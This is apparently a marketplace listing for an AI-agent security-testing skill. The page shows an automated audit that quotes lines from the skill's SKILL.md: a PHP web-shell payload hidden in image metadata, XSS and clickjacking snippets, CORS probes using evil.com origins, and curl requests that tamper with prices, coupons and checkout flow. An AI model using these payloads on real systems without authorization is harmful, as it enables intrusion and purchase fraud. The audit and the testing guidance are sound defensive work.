Skip to main content

wstg-logic-client-api

Facilitates comprehensive business logic, client-side, and API security testing to identify vulnerabilities and ensure robust application security.

Install this skill

or
0/100

Security score

The wstg-logic-client-api skill was audited on May 24, 2026 and we found 77 security issues across 3 threat categories, including 1 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 118

Eval function call - arbitrary code execution

SourceSKILL.md
118eval()
medium line 84

System command execution

SourceSKILL.md
84# Create with: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
medium line 16

Curl to non-GitHub URL

SourceSKILL.md
16curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":-1,"price":100}'
medium line 19

Curl to non-GitHub URL

SourceSKILL.md
19curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":0.001}'
medium line 22

Curl to non-GitHub URL

SourceSKILL.md
22curl -X POST https://TARGET/api/checkout -d '{"item_id":1,"price":0.01}'
medium line 25

Curl to non-GitHub URL

SourceSKILL.md
25curl -X POST https://TARGET/api/checkout -d '{"amount":100,"currency":"JPY"}'
medium line 29

Curl to non-GitHub URL

SourceSKILL.md
29curl -X POST https://TARGET/api/apply-coupon -d '{"code":"SAVE50","code":"SAVE50"}'
medium line 39

Curl to non-GitHub URL

SourceSKILL.md
39curl -s -H "Cookie: session=TOKEN" https://TARGET/checkout/confirm
medium line 42

Curl to non-GitHub URL

SourceSKILL.md
42curl -X POST https://TARGET/checkout -d '{"step":3,"complete":true}'
medium line 60

Curl to non-GitHub URL

SourceSKILL.md
60curl -s -X POST https://TARGET/api/redeem \
medium line 67

Curl to non-GitHub URL

SourceSKILL.md
67curl -s -X POST https://TARGET/api/vote -d '{"post_id":1}' \
medium line 80

Curl to non-GitHub URL

SourceSKILL.md
80curl -X POST https://TARGET/upload \
medium line 89

Curl to non-GitHub URL

SourceSKILL.md
89curl -X POST https://TARGET/upload -F "[email protected]"
medium line 170

Curl to non-GitHub URL

SourceSKILL.md
170curl -sI https://TARGET | grep -i "x-frame-options\|content-security-policy"
medium line 199

Curl to non-GitHub URL

SourceSKILL.md
199curl -sI https://TARGET/api/data -H "Origin: https://evil.com" | grep -i "access-control"
medium line 204

Curl to non-GitHub URL

SourceSKILL.md
204curl -sI https://TARGET/api/data -H "Origin: null" | grep -i "access-control"
medium line 208

Curl to non-GitHub URL

SourceSKILL.md
208curl -sI https://TARGET/api/data -H "Origin: https://evil.TARGET" | grep -i "access-control"
medium line 211

Curl to non-GitHub URL

SourceSKILL.md
211curl -sI https://TARGET/api/data -H "Origin: https://TARGETevil.com" | grep -i "access-control"
medium line 212

Curl to non-GitHub URL

SourceSKILL.md
212curl -sI https://TARGET/api/data -H "Origin: https://evil-TARGET" | grep -i "access-control"
medium line 225

Curl to non-GitHub URL

SourceSKILL.md
225curl -s https://TARGET/swagger.json
medium line 226

Curl to non-GitHub URL

SourceSKILL.md
226curl -s https://TARGET/openapi.json
medium line 227

Curl to non-GitHub URL

SourceSKILL.md
227curl -s https://TARGET/api-docs
medium line 228

Curl to non-GitHub URL

SourceSKILL.md
228curl -s https://TARGET/swagger/v1/swagger.json
medium line 229

Curl to non-GitHub URL

SourceSKILL.md
229curl -s https://TARGET/v1/api-docs
medium line 230

Curl to non-GitHub URL

SourceSKILL.md
230curl -s https://TARGET/.well-known/openapi.json
medium line 235

Curl to non-GitHub URL

SourceSKILL.md
235curl -s -o /dev/null -w "%{http_code}" -X $method https://TARGET/api/endpoint
medium line 240

Curl to non-GitHub URL

SourceSKILL.md
240curl -s https://TARGET/api/v1/users
medium line 241

Curl to non-GitHub URL

SourceSKILL.md
241curl -s https://TARGET/api/v2/users
medium line 242

Curl to non-GitHub URL

SourceSKILL.md
242curl -s -H "Accept: application/vnd.api.v1+json" https://TARGET/api/users
medium line 249

Curl to non-GitHub URL

SourceSKILL.md
249curl -s -X POST https://TARGET/graphql \
medium line 254

Curl to non-GitHub URL

SourceSKILL.md
254curl -s -X POST https://TARGET/graphql \
medium line 259

Curl to non-GitHub URL

SourceSKILL.md
259curl -s -X POST https://TARGET/graphql \
medium line 264

Curl to non-GitHub URL

SourceSKILL.md
264curl -s -X POST https://TARGET/graphql \
medium line 295

Curl to non-GitHub URL

SourceSKILL.md
295GET_RESPONSE=$(curl -s https://TARGET/api/profile -H "Cookie: session=TOKEN")
medium line 298

Curl to non-GitHub URL

SourceSKILL.md
298curl -X PUT https://TARGET/api/profile \
low line 16

External URL reference

SourceSKILL.md
16curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":-1,"price":100}'
low line 19

External URL reference

SourceSKILL.md
19curl -X POST https://TARGET/api/cart -d '{"item_id":1,"quantity":0.001}'
low line 22

External URL reference

SourceSKILL.md
22curl -X POST https://TARGET/api/checkout -d '{"item_id":1,"price":0.01}'
low line 25

External URL reference

SourceSKILL.md
25curl -X POST https://TARGET/api/checkout -d '{"amount":100,"currency":"JPY"}'
low line 29

External URL reference

SourceSKILL.md
29curl -X POST https://TARGET/api/apply-coupon -d '{"code":"SAVE50","code":"SAVE50"}'
low line 39

External URL reference

SourceSKILL.md
39curl -s -H "Cookie: session=TOKEN" https://TARGET/checkout/confirm
low line 42

External URL reference

SourceSKILL.md
42curl -X POST https://TARGET/checkout -d '{"step":3,"complete":true}'
low line 54

External URL reference

SourceSKILL.md
54-X POST https://TARGET/api/send-otp -d '{"phone":"1234567890"}'
low line 60

External URL reference

SourceSKILL.md
60curl -s -X POST https://TARGET/api/redeem \
low line 67

External URL reference

SourceSKILL.md
67curl -s -X POST https://TARGET/api/vote -d '{"post_id":1}' \
low line 80

External URL reference

SourceSKILL.md
80curl -X POST https://TARGET/upload \
low line 89

External URL reference

SourceSKILL.md
89curl -X POST https://TARGET/upload -F "[email protected]"
low line 92

External URL reference

SourceSKILL.md
92# <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
low line 145

External URL reference

SourceSKILL.md
145https://TARGET/page#<img src=x onerror=alert(1)>
low line 146

External URL reference

SourceSKILL.md
146https://TARGET/page#javascript:alert(1)
low line 149

External URL reference

SourceSKILL.md
149https://TARGET/page?q=<script>alert(1)</script>
low line 150

External URL reference

SourceSKILL.md
150https://TARGET/search?term=test" onmouseover="alert(1)
low line 162

External URL reference

SourceSKILL.md
162// <iframe src="https://TARGET" id="target"></iframe>
low line 170

External URL reference

SourceSKILL.md
170curl -sI https://TARGET | grep -i "x-frame-options\|content-security-policy"
low line 174

External URL reference

SourceSKILL.md
174# <iframe src="https://TARGET/sensitive-action" style="opacity:0.1" width="500" height="500"></iframe>
low line 199

External URL reference

SourceSKILL.md
199curl -sI https://TARGET/api/data -H "Origin: https://evil.com" | grep -i "access-control"
low line 200

External URL reference

SourceSKILL.md
200# Vulnerable if: Access-Control-Allow-Origin: https://evil.com
low line 204

External URL reference

SourceSKILL.md
204curl -sI https://TARGET/api/data -H "Origin: null" | grep -i "access-control"
low line 208

External URL reference

SourceSKILL.md
208curl -sI https://TARGET/api/data -H "Origin: https://evil.TARGET" | grep -i "access-control"
low line 211

External URL reference

SourceSKILL.md
211curl -sI https://TARGET/api/data -H "Origin: https://TARGETevil.com" | grep -i "access-control"
low line 212

External URL reference

SourceSKILL.md
212curl -sI https://TARGET/api/data -H "Origin: https://evil-TARGET" | grep -i "access-control"
low line 225

External URL reference

SourceSKILL.md
225curl -s https://TARGET/swagger.json
low line 226

External URL reference

SourceSKILL.md
226curl -s https://TARGET/openapi.json
low line 227

External URL reference

SourceSKILL.md
227curl -s https://TARGET/api-docs
low line 228

External URL reference

SourceSKILL.md
228curl -s https://TARGET/swagger/v1/swagger.json
low line 229

External URL reference

SourceSKILL.md
229curl -s https://TARGET/v1/api-docs
low line 230

External URL reference

SourceSKILL.md
230curl -s https://TARGET/.well-known/openapi.json
low line 235

External URL reference

SourceSKILL.md
235curl -s -o /dev/null -w "%{http_code}" -X $method https://TARGET/api/endpoint
low line 240

External URL reference

SourceSKILL.md
240curl -s https://TARGET/api/v1/users
low line 241

External URL reference

SourceSKILL.md
241curl -s https://TARGET/api/v2/users
low line 242

External URL reference

SourceSKILL.md
242curl -s -H "Accept: application/vnd.api.v1+json" https://TARGET/api/users
low line 249

External URL reference

SourceSKILL.md
249curl -s -X POST https://TARGET/graphql \
low line 254

External URL reference

SourceSKILL.md
254curl -s -X POST https://TARGET/graphql \
low line 259

External URL reference

SourceSKILL.md
259curl -s -X POST https://TARGET/graphql \
low line 264

External URL reference

SourceSKILL.md
264curl -s -X POST https://TARGET/graphql \
low line 295

External URL reference

SourceSKILL.md
295GET_RESPONSE=$(curl -s https://TARGET/api/profile -H "Cookie: session=TOKEN")
low line 298

External URL reference

SourceSKILL.md
298curl -X PUT https://TARGET/api/profile \
Scanned on May 24, 2026
View Security Dashboard
Installation guide →
GitHub Stars 283
Rate this skill
Categorydevelopment
UpdatedMay 29, 2026
openclawapitestingqa-engineersecurity-engineerbackend-developerdevelopment
CyberStrikeus/CyberStrike